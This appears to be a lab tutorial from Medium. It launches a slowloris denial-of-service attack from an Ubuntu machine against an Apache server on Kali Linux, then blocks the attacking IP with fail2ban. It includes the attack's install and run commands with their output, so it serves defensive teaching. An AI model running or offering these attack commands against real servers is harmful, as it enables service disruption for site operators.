DOS Prevention — Step by step guide

DOS Attack From Ubuntu OS

  • Here we will run DOS attack using slowloris. Slowloris is very common tool used in DOS attacks.
  • Open terminal on Ubuntu machine (Attacker)
  • Type sudo apt-get update
  • Type sudo apt-get install python3
  • Type sudo apt-get install python3-pip
  • Type pip3 -version
root@ubuntu:/home/iicybersecurity#pip3 --version pip 9.0.1 from /usr/lib/python3/dist-packages (python 3.6)root@ubuntu:/home/iicybersecurity#pip3 install slowloris Collecting slowloris Downloading https://files.pythonhosted.org/packages/a6/37/5ae3d027727122039f52a22d278f1d73f564e03e5fdb93f10e3a2f26aa06/Slowloris-0.2.0.tar.gz Building wheels for collected packages: slowloris Running setup.py bdist_wheel for slowloris ... done Stored in directory: /root/.cache/pip/wheels/bd/a1/f1/35dd5184db4e890b6ff5c992ff1f7a1b8b30e9bcd89aa6f7ba Successfully built slowloris Installing collected packages: slowloris Successfully installed slowloris-0.2.0root@ubuntu:/home/iicybersecurity#slowloris --help usage: slowloris [-h] [-p PORT] [-s SOCKETS] [-v] [-ua] [-x] [--proxy-host PROXY_HOST] [--proxy-port PROXY_PORT] [--https] [--sleeptime SLEEPTIME] [host] Slowloris, low bandwidth stress test tool for websites positional arguments: host Host to perform stress test on optional arguments: -h, --help show this help message and exit -p PORT, --port PORT Port of webserver, usually 80 -s SOCKETS, --sockets SOCKETS Number of sockets to use in the test -v, --verbose Increases logging -ua, --randuseragents Randomizes user-agents with each request -x, --useproxy Use a SOCKS5 proxy for connecting --proxy-host PROXY_HOST SOCKS5 proxy host --proxy-port PROXY_PORT SOCKS5 proxy port --https Use HTTPS for the requests --sleeptime SLEEPTIME Time to sleep between each header sent.
  • Above screenshot of wireshark shows the receiving of TCP packets. As victim is running with apache2 service. By default slowloris send multiple data packets on port 80.
  • Above shows very simple scenario that how dos attack is stimulated. For defending such dos attacks. we will use fail2ban.

Victim/ Defender Machine — Kali OS

Fail2Ban Installation

  • We will testing on Linux Distros. On attacking we will use Ubuntu 18.04 & on victim-defend we will use Kali Linux on.
  • Kali Linux (Victim & Defender) — 192.168.1.9
  • Ubuntu (Attacker) — 192.168.1.8
  • For Installation on Kali Linux. Open terminal
  • Type sudo apt-get update
  • Type sudo apt-get install fail2ban
  • Type sudo service apache2 start
  • Type sudo systemctl status apache2
root@kali:/etc/fail2ban#sudo systemctl status apache2 ● apache2.service - The Apache HTTP Server Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled) Active: active (running) since Tue 2019-11-05 02:09:37 EST; 2h 47min ago Process: 4749 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS) Main PID: 4753 (/usr/sbin/apach) Tasks: 152 (limit: 4662) Memory: 91.3M CGroup: /system.slice/apache2.service ├─4753 /usr/sbin/apache2 -k start ├─4754 /usr/sbin/apache2 -k start ├─6073 /usr/sbin/apache2 -k start ├─6074 /usr/sbin/apache2 -k start ├─6075 /usr/sbin/apache2 -k start ├─6077 /usr/sbin/apache2 -k start ├─6079 /usr/sbin/apache2 -k start ├─6080 /usr/sbin/apache2 -k start ├─6081 /usr/sbin/apache2 -k start ├─6083 /usr/sbin/apache2 -k start ├─6084 /usr/sbin/apache2 -k start ├─6085 /usr/sbin/apache2 -k start ├─6086 /usr/sbin/apache2 -k start ├─6087 /usr/sbin/apache2 -k start ├─6088 /usr/sbin/apache2 -k start ├─6089 /usr/sbin/apache2 -k start ├─6090 /usr/sbin/apache2 -k start ├─6091 /usr/sbin/apache2 -k start ├─6092 /usr/sbin/apache2 -k start ├─6093 /usr/sbin/apache2 -k start ├─6094 /usr/sbin/apache2 -k start
  • Press Ctrl+c
  • Before starting fail2ban service. We have to configure it. For that
  • Then enter enabled = true after [apache-auth], [apache-badbots], [apache-noscript] & [apache-overflows] as shown below.
ignorecommand = /path/to/command ignorecommand = "bantime" is the number of seconds that a host is banned. bantime =30 A host is banned if it has generated "maxretry" during the last "findtime" seconds. findtime =50 "maxretry" is the number of failures before a host get banned. maxretry =10 HTTP servers # [apache-auth]enabled = true port = http,https logpath = %(apache_error_log)s [apache-badbots] Ban hosts which agent identifies spammer robots crawling the web for email addresses. The mail outputs are buffered.enabled = true port = http,https logpath = %(apache_access_log)s bantime = 48h maxretry = 1 [apache-noscript]enabled = true port = http,https logpath = %(apache_error_log)s [apache-overflows]enabled = true port = http,https logpath = %(apache_error_log)s maxretry = 2[apache] enabled =true port = http,https filter = apache-auth logpath =/var/log/apache2/*error.log maxretry =2 findtime =50 ignoreip =root@kali:/etc/fail2ban#sudo /etc/init.d/fail2ban start [ ok ] Starting fail2ban (via systemctl): fail2ban.service. root@kali:/etc/fail2ban#root@kali:/etc/fail2ban#sudo systemctl status fail2ban.service ● fail2ban.service - Fail2Ban Service Loaded: loaded (/lib/systemd/system/fail2ban.service; disabled; vendor preset: disabled) Active: active (running) since Tue 2019-11-05 05:02:20 EST; 3s ago Docs: man:fail2ban(1) Process: 6475 ExecStartPre=/bin/mkdir -p /var/run/fail2ban (code=exited, status=0/SUCCESS) Main PID: 6476 (fail2ban-server) Tasks: 13 (limit: 4662) Memory: 17.9M CGroup: /system.slice/fail2ban.service └─6476 /usr/bin/python3 /usr/bin/fail2ban-server -xf start Nov 05 05:02:20 kali systemd[1]: Starting Fail2Ban Service... Nov 05 05:02:20 kali systemd[1]: Started Fail2Ban Service. Nov 05 05:02:21 kali fail2ban-server[6476]: Server ready

Attacker Machine — Ubuntu OS

  • Type slowloris 192.168.1.9 -p 80 & slowloris will start sending packets to target IP address.
  • 192.168.1.9 is the target IP address
  • -p to mention port no. Using port 80 it will generate the traffic.
root@ubuntu:/home/iicybersecurity#slowloris 192.168.1.9 -p 80 [05-11-2019 02:08:59] Attacking 192.168.1.9 with 150 sockets. [05-11-2019 02:08:59] Creating sockets... [05-11-2019 02:08:59] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:09:14] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:09:29] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:09:44] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:09:59] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:10:14] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:10:29] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:10:44] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:11:00] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:11:15] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:11:30] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:11:45] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:12:00] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:12:15] Sending keep-alive headers... Socket count: 150 [05-11-2019 02:12:30] Sending keep-alive headers... Socket count: 150

Victim/ Defender Machine

  • Now go to victim machine Kali Linux. In the Wireshark, you will notice DOS from attacker machine to target IP address.
  • Type sudo fail2ban-client set apache banip 192.168.1.8
  • This command will block the target IP address. Below screenshot shows that 192.168.1.8 has blocked.
  • Above screenshot shows that none of the packets are receiving from target machine.
  • Now if you check fail2ban status. You will notice that attacker IP has been blocked because attacker was sending multiple packets.
  • For checking status open another terminal type sudo fail2ban-client status apache
root@kali:/var/log/apache2#sudo fail2ban-client status apache Status for the jail: apache |- Filter | |- Currently failed: 0 | |- Total failed: 1 |- File list: /var/log/apache2/error.log - Actions |- Currently banned: 1 |- Total banned: 1 `- Banned IP list: 192.168.1.8

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store